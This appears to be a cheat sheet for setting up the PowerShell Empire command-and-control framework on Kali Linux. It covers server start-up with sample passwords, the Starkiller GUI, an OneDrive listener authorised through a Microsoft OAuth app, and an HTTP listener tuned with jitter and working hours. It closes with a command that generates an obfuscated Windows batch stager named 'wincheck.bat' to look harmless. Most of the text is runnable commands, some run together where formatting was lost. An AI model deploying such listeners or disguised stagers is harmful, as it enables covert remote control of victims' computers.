PowerShell Empire
on Kali-Linux
Start Server
sudo powershell-empire serverpowershell-empire server --username alice --password root00--RESTful API on port 1337 SocketIO on port 5000 username: empireadmin password: password123
Empire GUI Starkiller (https://github.com/BC-SECURITY/Starkiller)
sudo apt update && sudo apt install -y starkillerListeners
listeners > uselisteners dbx http meterpreter redirector OneDrive Listener http://gist.github.com/mr64bit/3fd8f321717c9a6423f7949d494b6cd9 Create an app at https://apps.dev.microsoft.com
The only things you need are an app password ("Generate new password"), an app platform with a redirect url, ("https://login.live.com/oauth20_desktop.srf" works good as a default) and the delegated permissions Files.ReadWrite, User.Read, and offline_access. Example: https://imgur.com/a/rd47l
Once you create the app, you will be given an Application ID. Enter this into your listener options. "set ClientId " "set ClientSecret <you application secret/password>" Then do "execute". This will not start the listener yet, but will give you an OAuth URL to sign in to. You will be redirected to a URL like "https://login.live.com/oauth20_desktop.srf?code=M12ac16111-a605-42e9-9dbf-c155de30cfc6&lc=1033". Take the code parameter from that URL and enter it into the listener options. "set AuthCode M12ac16111-a605-42e9-9dbf-c155de30cfc6" Do "execute" again, and the listener will start.
You will not have to repeat this process at every start up, the listener will store a refresh token. This token may expire after a week or two, and the sign-in process must be done again.
Examples
http Listener uselistener > http set Name demo_http1776 set Port 1776 set WorkingHours 07:00-19:00 set DefaultDelay 5 set DefaultJitter 0.8 set SlackURL https://hooks.slack.com/services/ABC/ABC/1234 execute
usestager windows/launcher_bat set Listener demo_http1776 set Obfusecate True set OutFile wincheck.bat execute
Last updated